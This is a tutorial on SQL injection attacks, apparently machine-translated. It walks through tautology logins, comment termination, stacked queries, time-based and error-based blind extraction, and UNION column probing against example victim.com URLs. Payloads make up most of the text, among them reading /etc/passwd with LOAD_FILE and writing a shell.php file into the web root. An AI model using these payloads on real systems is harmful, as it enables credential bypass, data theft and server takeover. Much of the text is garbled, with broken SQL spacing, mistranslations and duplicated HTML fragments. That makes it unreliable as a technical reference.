SQL injection attacks and Defense Analysis
Partially sorted...
What is SQL injection?
In a simple example, a shopping website can search for products whose price is smaller than a certain value.
Users can enter this value, for example, 100.
However, if you enter 100 OR '1' = '1
The resulting SQL statement,
SELECT *FROM ProductsTblWHERE Price < '100.00' OR '1' = '1'ORDER BY ProductDescription;
In this way, you can obtain all product information.
Let's look at another example,
For user identity authentication, you need to enter the user name and password
However, if the user adds the injection code to the password,
SELECT useridFROM CMSUsersWHERE user = 'foo' AND password = 'password' OR '1' = '1';
In this way, you can pass the verification.
Inline SQL Injection)
Inline injection is to point to the query. After some SQL code is injected, all the original queries will still be executed.
Inline string Injection
Example,
Use the following SQL statement to update all passwords in the users table to new_password, which is very serious.
UPDATE usersSET password = 'new_password'WHERE username = 'Bob' and password = 'old_password' OR '1'='1'
Inline numeric value Injection
Note that you do not need to add single quotes between the start and end when injecting numbers.
SELECT * FROM messagesWHERE uid = 45 or 1 = 1/* permanent conditions */order by sorted Ed;
Because the permanent condition (or 1 = 1) is injected, the database returns all rows in the message table, not just the rows sent to a user.
Terminated SQL Injection
Terminate SQL injection means that when an attacker injects SQL code, the attacker successfully ends the original query statement by commenting out the remaining part of the original query statement.
Example,
Inject "'or 1 = 1; --" code
SELECT *FROM administratorsWHERE username = '' or 1=1;-- ' AND password = '';
Because the 1 = 1 permanent true condition exists, this statement returns all rows in the administrators table.
SELECT *FROM administratorsWHERE username = 'admin'/*' AND password = '*/ '';
Sometimes you may find that you cannot use dual-hyphens (-) in some scenarios (-).
In this case, you can use multi-line comments (/**/) to replace the original comments in the SQL statement.
This technology requires that multiple vulnerable parameters exist, and you need to know the location of these parameters in SQL statements.
Execute multiple statements
SQL Server 6.0 introduces Server cursors in its architecture, allowing you to execute strings containing multiple statements on the same connection handle.
All SQL Server versions later than 6.0 support this function and allow the following statements to be executed:
SELECT foo FROM bar; SELECT foo2 FROM bar2;
MySQL also introduced this function in versions 4.1 and later, but it does not support this function by default.
To use this technology, you must terminate the first statement so that you can connect to any SQL code.
Example,
http://www.victim.com/search.php?s=test';SELECT '' INTO OUTFILE '/var/www/victim.com/shell.php';--
Time Delay
Time delay is a powerful technology. Although the Web server can hide errors or data, it must wait for the database to return results, so it can be used to confirm whether SQL Injection exists. This technology is especially suitable for blind injection.
The Microsoft SQL Server contains a built-in command to introduce latency to queries: WAITFOR DELAY 'hours: minutes: seconds '. For example, if the following request is sent to the Web server of Victim, the response of the server takes 5 seconds:
http://www.victim.com/basket.aspx?uid=45;waitfor delay '0:0:5';--
The latency in the server response convinced us that we are injecting SQL code into the background database.
The MySQL database does not have commands equivalent to waitfor delay, but it can use functions that take a long time to introduce latency. BENCHMARK function is a good choice
Mysql> select benchmark (10000000, ENCODE ('hello', 'ms '));
Injection attack methods
First, determine the specific database at the backend. The specific version and method depend on whether the backend is blind, that is, whether the web server will return errors or returned values to you.
The basic method is to use different syntaxes of different databases for verification,
For example, for String concatenation, the syntax of each database is different.
Extracting data through UNION statements
You can use union to add your own SQL statements and obtain more information.
SELECT column-1,column-2,…,column-N FROM table-1UNIONSELECT column-1,column-2,…,column-N FROM table-2
The limit for this method is,
• The two queries must return exactly the same number of columns. • The data in the corresponding columns of the two SELECT statements must be of the same (or at least compatible) types.
How can you ensure that your SQL statements have the same number and type of columns as the original SQL statements?
You can try it one by one,
http://www.victim.com/products.asp?id=12+union+select+null--http://www.victim.com/products.asp?id=12+union+select+null,null--http://www.victim.com/products.asp?id=12+union+select+null,null,null--
Try until no error is reported
For the same type,
http://www.victim.com/products.asp?id=12+union+select+‘test’,NULL,NULL,NULLhttp://www.victim.com/products.asp?id=12+union+select+NULL,‘test’,NULL,NULL
No error is reported, indicating that the type is correct.
Example,
For instance, the following URL wocould retrieve both the name of the current user and the name of the current database:
Http://www.victim.com/products.asp? Id = 12 + union + select + NULL, system_user, db_name (), NULL
Using conditional statements
Conditional Syntax of various databases,
Approach 1: Time-Based
On SQL Server, for instance, one of the first things you might want to know is whether the user login Ming the queries is the system administrator account, sa.
Http://www.victim.com/products.asp? Id = 12; if + (system_user = 'sa ') + WAITFOR + DELAY + '0: 0: 5 '--
Approach 2: Error-Based
Http://www.victim.com/products.asp? Id = 12/is_srvrolemember ('sysadmin ')
If the following function returns 1, 12/1 is still equal to 12. If 0, 12/0 is returned, an exception is obvious. In this way, the value of the following function can be inferred.
As an example, let's see how we can use a CASE statement to check, in our e-commerce application, whether the current user is sa:
Http://www.victim.com/products.asp? Id = 12/(case + when + (system_user = 'sa ') + then + 1 + else + 0 + end)
Approach 3: Content-Based
To avoid errors,
Http://www.victim.com/products.asp? Id = 12% 2B (case + when + (system_user + = + 'sa ') + then + 1 + else + 0 + end)
For example, in the case above,
Change Division to remainder
Working with Strings
Http://www.victim.com/search.asp? Brand = acme
Equivalent,
Http://www.victim.com/search.asp? Brand = acm '% 2B 'e or http://www.victim.com/search.asp? Brand = AC' % 2B 'M' % 2B 'e
Because % 2B, escape as +
It is also equivalent,
Http://www.victim.com/search.asp? Brand = AC' % 2 Bchar (109) % 2B 'e
The following can be injected in this way,
Http://www.victim.com/search.asp? Brand = AC' % 2 Bchar (108% 2B (case + when + (system_user + = + 'sa ') + then + 1 + else + 0 + end) % 2B 'e
Based on conditions,
Http://www.victim.com/search.asp? Brand = acme
Or
Http://www.victim.com/search.asp? Brand = acle
The preceding attack can only obtain 1 bit of data. This attack can be extended to len's judgment to determine len using the binary method.
+ 8) + then + 1 + else + 0 + end "href =" http://www.victim.com/products.asp? Id = 10/(case + when + (len (system_user) +> + 8) + then + 1 + else + 0 + end "> + 8) + then + 1 + else + 0 + end "href =" http://www.victim.com/products.asp? Id = 10/(case + when + (len (system_user) +> + 8) + then + 1 + else + 0 + end "> http://www.victim.com/products.asp? Id = 10/(case + when + (len (system_user) +> + 8) + then + 1 + else + 0 + end
Then we can use the binary method to find each char,
+ 128) + then + 1 + else + 0 + end) "href =" http://www.victim.com/products.asp? Id = 12/(case + when + (ascii (substring (select + system_user), 128) +> +) + then + 1 + else + 0 + end "> + 128) + then + 1 + else + 0 + end)" href = "http://www.victim.com/products.asp? Id = 12/(case + when + (ascii (substring (select + system_user), 128) +> +) + then + 1 + else + 0 + end "> http://www.victim.com/products.asp? Id = 12/(case + when + (ascii (substring (select + system_user), 128) +> +) + then + 1 + else + 0 + end)
Exploiting the operating system
Accessing the file system
Read,
The LOAD_FILE function also handles binary files transparently, which means that with a little bit of finesse we can use the function to read binary files from the remote host easily:
For example,
'Union select LOAD_FILE ('/etc/passwd ')#
Insert into foo set line = load_file ('/tmp/temp. bin ');
Write,
Aaa 'Union select NULL, 'sensepost 2008 \ n' into dumpfile'/tmp/sp.txt '#
Executing operating system commands
Exploiting second-order SQL injection
The first attack request only writes the Attack Script to storage, such as a database.
The second request reads the attack script from the database and triggers the execution. In this case, the actual attack is generated.
Finding Second-Order Vulnerabilities
Second-order SQL injection is more difficult to detect than first-order vulnerabilities, because your exploit is submitted in one request and executed in the application's handling of a different request.